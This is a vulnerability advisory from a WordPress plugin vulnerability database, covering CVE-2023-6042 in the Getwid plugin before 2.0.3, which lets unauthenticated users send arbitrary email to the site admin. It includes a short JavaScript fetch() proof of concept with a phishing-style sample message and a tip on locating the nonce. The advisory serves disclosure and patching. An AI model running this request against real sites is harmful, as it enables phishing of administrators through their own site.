WordPress Plugin Vulnerabilities

Getwid < 2.0.3 - Unauthenticated Arbitrary Email Sending to Admin

Description

Any unauthenticated user may send e-mail from the site with any title or content to the admin

Proof of Concept

fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=getwid_send_mail", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "data[subject]=Urgent WordPress update neeeds to be installed&data[message]=Fake notification for the admin with some link to be clicked&security=4c71dae953", /* the nonce is in the page source under recaptcha_v2_contact_form key */
  "method": "POST", 
});

Affects Plugins

Plugin icon
getwid
Fixed in 2.0.3

References

CVE
CVE-2023-6042

Classification

Type
AUTHBYPASS
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
56a1c050-67b5-43bc-b5b6-28d9a5a59eba

Timeline

Publicly Published
2023-12-15 (about 4 months ago)
Added
2023-12-16 (about 4 months ago)
Last Updated
2023-12-16 (about 4 months ago)

Other

Published
Title
Published
2014-08-01
Title
Easy Photo Album <= 1.1.5 - Album Information Disclosure
Published
2023-11-24
Title
JobSearch WP Job Board < 2.3.4 - Authentication Bypass
Published
2021-02-02
Title
MStore API < 3.2.0 - Authentication Bypass With Sign In With Apple
Published
2020-07-14
Title
Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
Published
2022-01-17
Title
Coming Soon & Maintenance Plugin by NiteoThemes < 4.0.19 - Unauthenticated Arbitrary CSS Update